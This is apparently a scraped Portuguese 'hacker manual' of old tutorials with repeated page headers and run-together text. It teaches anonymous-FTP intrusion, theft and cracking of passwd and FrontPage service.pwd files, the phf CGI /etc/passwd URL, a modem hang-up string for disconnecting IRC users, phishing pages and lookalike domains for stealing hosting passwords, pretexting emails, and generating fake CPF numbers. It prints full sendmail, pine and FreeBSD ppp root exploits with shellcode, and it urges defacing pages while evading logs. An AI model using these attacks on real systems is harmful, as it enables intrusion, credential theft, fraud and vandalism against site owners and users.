* Você pirateia software * Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus) * Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo) * Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro.

Page 17: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Ataques via FTP

Para Hackear um Servidor FTP, Primeiro vc deve saber o endereço do Host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:Lista de Alguns FTP'sftp.mandic.com.brftp.netscape.comftp.angelfire.com

Let's HaCk !!!Existem vários Programas de FTP'S, se não quiser saber de ftp porra nenhuma use o do DOS !!!Vá ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br ou outro servidor. Ao conectar ele pedirá a senha e o Password, tente user os passwords UNIX, se não der vc deve entrar INVISÍVEL !!!!

Como entrar Invisível??????No login pressione ENTER, no password pressione Novamente... . Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite:quote cwd ~rootPressione ENTER novamente e digite:quote pass ftp

Pronto, vc esta Hackeando...Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....

ATENÇÃO !!!!Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção....MEU DEUS, EU ENTREI e AGORA o QUE FAÇO??????Ao entrar vc vai estar no Diretório do login, tipo \home\root\, dai, para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir é um usuário,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login.... Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!!Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser na #CADEIA# onde você vai parar !Não me responsabilizo por atos cometidos nos Hosts... o problema é de quem HaCkEiA, e não meu, pois tome muito cuidado, e NUNCA apague NADA !!!!!!!!

Tutorial 2

Page 18: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Ataque por FTP

A invasão por FTP é, de certa forma, simples de ser efetuadas, embora seja muito lenta e cansativa. Para isso exercê-la, você pode usar programas como o WebCracker e uma boa Wordlist, embora existam melhores programas.Este processo nada mais é do que um "jogo de tentativa e erro", onde você pode esperar o programa trabalhar, ou você mesmo pode entrar em ação, caso você tenha informações sobre o proprietário ta conta que você quer hackear; mas não se esqueça que nada que produza um bom resultado é fácil de ser realizado. Na maioria das vezes os servidores matêm logado os IPs que tiveram tentativas frustadas ao tentarem a conexão com o servidor FTP, por isso, não se esqueça de sempre, mas sempre utilizar um proxy anônimo quando for realizar este tipo de ataque... senão, isso pode ter consequencias mais graves do que você imagina. Bom, este tipo de ataque geralmente é utilizado para o hackeamento de páginas ou para a aquisição do arquivo se senhas do provedor, e como fazê-lo? Da seguinte forma: Suponhamos que você queira hackear um página, já conseguiu o Login e Senha dela, aí já tá na mão... é so usar um programa qualquer como o WS_FTP ou qualquer outro e modificar o código HTML da página. No caso do furto do arquivo de senhas, a coisa muda de figura... nunca subestime um Sysop, ele é mais inteligente do que você imagina, e, provavelmente não vai deixar o arquivo exposto no diretório /etc para que você possa simplesmente ir lá baixar o arquivo, então, provavelmente terá que sair procurar o arquivo pelos diretórios e depois, você pode utilizar a mesma wordlist usada anteriormente para desencryptar o arquivo de senhas. Lembre-se que somente entrando "anonymous" em um provedor você NÃO estará hackeando...

Page 19: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

CPF

O número de CPF é formado por 11 dígitos, nesse esquema: xxxxxxxxx-xx. Por meio deste texto, pretendo explicar como funciona o algorítmo de geração desse número.Primeiramente, invente os nove primeiros dígitos, por exemplo, 542369851-xx. Os x's servem para deixar o algorítmo correto. Vou explicar nas seguintes linhas como obter o primeiro e o segundo dígito que tanto nos interessa.

1)DESVENDANDO O PRIMEIRO DÍGITO:Calcule:10*d1 + 9*d2 + 8*d3 + 7*d4 + 6*d5 + 5*d6 + 4*d7 + 3*d8 + 2*d9OBS: dx é a posição do dígito. ex:d2 = Segundo dígito, no caso do nosso exemplo, o número quatro.Se você foi nas aulas de Matemática, vai chegar no resultado 253.Agora, divida esse número por 11 (número total de dígitos no CPF). Novamente, se não faltou nas aulas, irá obter o número 23 como resultado.OBS: Se esta divisão der um número com casas decimais depois da vírgula, como por exemplo 23,2 ignore o que vem depois da vírgula, considere apenas o inteiro.Multiplique dessa vez 23 * 11 (numero da divisão * numero total de digitos do CPF). Agora, Subtraia do número 253, vindo da primeira conta que você teve de fazer, o número obtido com a multiplicação 23 * 11. Se o resto for igual a 0 ou igual a 1, o primeiro dígito depois do hífen no CPF será igual a 0, obteremos assim o seguinte: 542369851-0x.Se o resultado da subtração for diferente de 0 e 1, para obter o primeiro x calcule: 11 menos o resto da subtração.

2)DESVENDANDO O SEGUNDO DÍGITO:Falta o segundo x. Vamos desvendá-lo... calcule o seguinte:11*d1 + 10*d2 + 9*d3 + 8*d4 + 7*d5 + 6*d6 + 5*d7 + 4*d8 + 3*d9 + 2*pridigOBS:"dx" é a posição do dígito e "pridig" é o primeiro x depois do hífen, no nosso caso, o número 0.Se você tem um pouco de massa encefálica dentro da cabeça, obterá o resultado 296. Divida isso por 11(número de dígitos do CPF). Obterá 26,909. Use só a parte inteira desse número e multiplique por 11 (26 * 11) O resultado será 286. Subtraia 296(vindo da primeira conta pra esse dígito) por 286(conta que acabamos de fazer). Obteremos o resultado 10. Vale a mesma regra que usamos no primeiro x. Se o resto for 0 ou 1, o x é igual a 0, se o resto da subtração for diferente de 0 ou 1, subtraia 11 pelo número. ex: Se a subtração der 5, faça 11 - 5 = 6. o x vai ser igual a 6. Mas voltando ao nosso número, o x deu igual a 10. Ou seja, o x é igual a 1. Assim sendo, CPF VÁLIDO obtido por nós foi: 542369851-01.

3)CONCLUSÃO:parabéns para nós!!! Tá aí... o algoritmo de geração de CPF's prontinho...Isso pode ser útil de duas formas:1º Se você precisar de um número de CPF, faça-o!

Page 20: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

2º Se você tiver conhecimentos em alguma linguagem de programação, faça um programa que gera esses números!

Page 21: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Derrubando usuários Lammers do Linux

Alguns lamers estão utilizando linux e entrando nos canais de IRC e apavorando outros lamers, mas o pior é que esses lamers que fazem isso só utilizam o Linux mesmo para fazer isso. Leram em alguma página que o Linux derruba qualquer um do IRC, que ele é o melhor sistema operacional que tem, que ele é ótimo para hackear... Certo... isso tudo é verdade! Não sou contra a arte hacker, mas sou completamente contra esses caras que usam o Linux para se sentirem superiores... vao se fuder!

Bom, baseado no que eu disse acima resolvi publicar um bug do Linux que derruba qualquer usuário dele que utiliza um modem para se conectar a Internet. Ps.: A porta de FTP ou de SMTP tem que está aberta!

Curte só: conecte no IP do PlayBoy por uma das portas abaixo e siga o que se fala:

* FTP (porta 21)

Após ter conectado, vai está esperando voce digitar o user e password, aí digite:

USER +++ATH0 (<- isso é um zero viu)

Desconecte dele... (se ele já não fizer isso por voce!)

Agora repita o procedimento mais uma vez.

* SMTP (25)

Após ter conectado digite:

VRFY +++ATH0

Desconecte dele...

Repita novamente!

É isso aí, após voce ter feito isso o cara terá sido desconectado! Esse bug existe a mais de 10 anos e ninguém fez nada contra ainda! é mole?

Page 22: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Hackeando extenções FrontPage

Estou aqui para explicar à vocês como penetrar em servidores rodando Microsoft Frontpage Extensions. A principal razão pela qual eu não incluí sub-capítulos no conteúdo foi porque... eu estou muito cansado.

Encontrando servidores que rodam extensões Frontpage. Usando seu browser, vá até algum destes sites:metacrawler.com, yahoo.com, google.com, excte.comProcure por haccess.htl <or> service.pwd

NOTA: -> service.pwd é o arquivo padrão para senhas -> haccess.htl contém o diretório atual do arquivo password se o service.pwd é falso ou as senhas estão em shadow

Note também que o service.pwd não é o único arquivo de senhas que pode ser encontrado. admin.pwd, users.pwd, Authors.pwd, administrators.pwd, também podem ser encontrados.

Ok. Depois de procurar, você encontrará uma lista com cerca de 100 sites rodando extensões frontpage. Clique em um dos links. Se você clicou em algum arquivo haccess.htl, você verá algo assim:

-Front Page-

Options None

<Limit GET POST PUT> order deny,allow deny from all </Limit> AuthName default_realm AuthUserFile c:/frontpage\ webs.content/_vti_pvt/service.pwd AuthGroupFile c:/frontpage\ webs.content/_vti_pvt/service.pwd

Nós vamos focalizar as duas últimas linhas. O AuthUserFile. Este é o diretório atual do arquivo password ativo (não é falso ou shadowed). Agora, faça o download do arquivo de senhas através do diretório especificado.

Volte aos resultados da procura. Se você clicou em um dos links e foi levado ao arquivo de senhas você verá algo do tipo:

systemphuc:aBcDeFj

Copie isso e coloque em formato DES (UNIX):

Page 23: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

systemphuc:aBcDeFj:0:0:comments:/:/bin/bash

Agora, crackeie isso usando seu cracker de senhas unix favorito. Eu gosto de usar John the Ripper. Ok, agora você tem um login e senha válidos. Isso pode ser usado de duas formas. A primeira é o IPC$ share (será discutido em outra oportunidade) e a Segunda é hackear o servidor de extensões frontpage. Para fazer isso abra o seu FrontPage, vá em File>Open ou Open Frontpage Web put, isso mostrará uma pequena “bola” opcional, marque-a e depois coloque a “bola” no endereço IP do servidor ou do endereço http (isso é meio confuso, mas é assim que se faz). Depois clique em conectar. Se o servidor não tiver senha você estará conectado e apto a alterar a página. Mas se o software foi instalado adequadamente e o username/senha forem solicitados... coloque o username/password que eu te mostrei como descobrir e crackeie. Clique em ok, agora você estará apto a alterar as páginas.

Você pode colocar mensagens na página como: "im a big stupid fuck i hacked you page, ha ha ha... ha ha ha".

Vulnerabilidade no aplicativo FrontPage

Ao longo dos últimos meses vem se verificando um crescimento na exploração, com sucesso, de vulnerabilidades no aplicativo Front Page. Estas vulnerabilidades permitem a um usuário remoto obter acesso `a arquivos e diretorios de um servidor WEB, permitindo obtenção dos arquivos de senhas dos administradores do serviço Front Page, ou a modificação direta do conteúdo das páginas publicadas.

2. Impacto Nota-se que o ambiente Windows com IIS 4.0 é seguramente onde tem ocorrido maior número de ataques, mas outros ambientes que permitam atualização via Front Page, (módulo para servidor Apache em Windows ou Unix, por exemplo) também são vulneráveis.

3. Solução - Retire os arquivos de exemplos que acompanham a distribuição - Aplique as correções ou atualize a versão do aplicativo Front Page [http://www.microsoft.com/security] - Habilite autenticação ao Extension Server - Monitore atividades, principalmente em arquivos e diretórios usados pelo Front Page, tais como: _vti_bin, _vti_pvt, _vti_inf.html, admin.dll, etc. - Proteja o arquivo de senhas 'service.pwd' Ex:

Page 24: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

<Files ~ "^\service.pwd">

Order deny,allow

Deny from all

</Files>

Page 25: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Hackeando WebPages

1-INTRODUÇÃO :O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções :Precauções-cuidados que você deve tomar.

Sobre as senhas-arquivos falando sobre as senhas.Desencryptando as senhas-como desencryptar senhas.Ftp-como hackear uma HP por ftp.Phf-como hackear uma HP usando o método phfHome page grátis-como hackear servidores de home page grátisHome page grátis 2-Outro método de como hackear servidores de home pages grátisJá cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidorTelnet e exploits-Como hackear uma page usando telnet e exploitsJá cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor.

2-PRECAUÇÕES:

Nesse texto vou ensinar diversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc...

3-SOBRE AS SENHAS :

A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix). Uma senha encryptada é mais ou menos assim :root:User:d7Bdg:1n2HG2:1127:20:SuperuserTomJones:p5Y(h0tiC:1229:20:TomJones,:/usr/people/tomjones:/bin/cshBBob:EUyd5XAAtv2dA:1129:20:BillyBob:/usr/people/bbob:/bin/csh

Page 26: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Agora o exemplo de uma senha com shadow :root:x:0:1:0000-Admin(0000):/:/usr/bin/cshdaemon:x:1:1:0000-Admin(0000):/:bin:x:2:2:0000-Admin(0000):/usr/bin:sys:x:3:3:0000-Admin(0000):/:adm:x:4:4:0000-Admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucicolisten:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid no body:/:noaccess:x:60002:60002:uid no access:/:webmastr:x:53:53:WWWAdmin:/export/home/webmastr:/usr/bin/cshpin4geo:x:55:55:PinPaperAdmin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.

4-DESENCRYPTANDO :

Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada.

Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt

E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.

5-FTP

Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos fazer é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo

Page 27: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo [email protected]. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..

6-PHF : O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser :http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd

Apenas isso e pronto!

7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):

Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!

8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa

Page 28: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito:Você tará que trocar para :Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail.Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuração DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i") Então escreva no dominio-->COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.htmlO endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo.

9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO

SERVIDOR Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto!

Page 29: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.

10-TELNET E EXPLOITS : Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo :Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.

cat << _EOF_ >/tmp/x.c#define RUN "/bin/ksh"#includemain(){execl(RUN,RUN,NULL);}_EOF_#cat << _EOF_ >/tmp/spawnfish.cmain(){execl("/usr/lib/sendmail","/tmp/smtpd",0);}_EOF_#cat << _EOF_ >/tmp/smtpd.cmain(){setuid(0); setgid(0);system("chown root /tmp/x ;chmod 4755 /tmp/x");}_EOF_##gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.cgcc -O3 -o /tmp/smtpd /tmp/smtpd.c#/tmp/spawnfishkill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|seds/"[ ]*"// |cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd/tmp/x.csleep 5if [ -u /tmp/x ] ; then

Page 30: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

echo "leet..."/tmp/xfi

Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode veros usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cadausuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidasnos seus inbox. Efetivamente deletando o lockfile respectivo.Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém.Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pinecatluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 greppinehamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05.302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pinecatluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 greppine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts/tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pinecatluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 greppinehamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4+ +

Page 31: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamorsEsse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD".

#include#include#include

#define BUFFER_SIZE 156 /* size of the bufer tooverflow */

#define OFFSET -290 /* number of bytes to jumpafter the startof the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[]){char *buf = NULL;unsigned long *addr_ptr = NULL;char *ptr = NULL;char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"/* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"/* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"/* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";/* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

Page 32: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

memset(buf, 0x90, i);ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++)*ptr++ = execshell[i];

addr_ptr = (long *)ptr;for(i=0;i < (104/4); i++)*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);}Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar. Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas.

tutorial2

HACKEANDO WEBPAGES!

1 - Pegando o Arquivo-Password via FTP

Um dos jeitos mais fáceis de de pegar acesso "super-usuário" é acessar anonimamente o ftp de alguma página. Primeiro aprenda um pouco sobre o arquivo-password.

root:User:d7Bdg:1n2HG2:1127:20:SuperuserTomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/cshBBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

Page 33: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

É claro que está página já foi hackeada pelo Psychotic, não tente hackea-la obviamente... Este é um exemplo de arquivo-password encriptado. O Superuser é a parte que te dá o root, a parte principal do arquivo.

root:x:0:1:Superuser:/:ftp:x:202:102:Anonymous ftp:/u1/ftp:ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Este é um outro exemplo de password arquivo, só que este tem uma diferença. Está "shadowed". Arquivos-password shadoweds não deixam você ver o password encriptado. Isso causa problemas para os crackers de passwords e os dicionários. Se não sabe o que é isso eu explico mais abaixo. Aqui temos outro exemplo de arquivo-password shadowed:

root:x:0:1:0000-Admin(0000):/:/usr/bin/cshdaemon:x:1:1:0000-Admin(0000):/:bin:x:2:2:0000-Admin(0000):/usr/bin:sys:x:3:3:0000-Admin(0000):/:adm:x:4:4:0000-Admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucicolisten:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid no body:/:noaccess:x:60002:60002:uid no access:/:webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/cshpin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Arquivos shadowed tem um "x" no lugar do password, como voce pode ver aí em cima. Algumas vezes tem um "*" também.

Agora que você conhece um pouco sobre estes arquivos você deve saber como distinguir um normal de um shadowed. Se o password não estiver shadowed, não preciso nem explicar o que fazer! Agora vamos ver como quebrar passwords shadowed!

2 - Cracking Arquivos-Password Shadowed

Não é tão difícil quanto vocês pensam. Se bem que os arquivos variam de sistema pra sistema. Primeiro copie o arquivo-password para seu computador. Segundo:

Page 34: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Pegue um password cracker e/ou um gerador de wordlist (dicionário). É quase impossível achar um bom cracker, mas existem alguns regulares, como: Cracker Jack, John the Ripper, Brute Force Cracker e Jack the Ripper. Não me pergunte onde encontrá-los, procure! Quando você começar a crackear o password, você vai ser perguntado para achar o arquivo-password. É onde o dicionário entra. Ele vai achar todas as combinações de letras, números, ASCII e lowercase possíveis. Nós estaremos publicando em breve também nosso cracker-wordlist, chamado "The Perfect Drug". Aguardem! Vá crackeando e veja em que direção está indo o password. Muitas vezes você descobre antes que o dicionário termine.

Page 35: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Ip's

1ª) Descobrindo o IP ou Host de uma provedora :

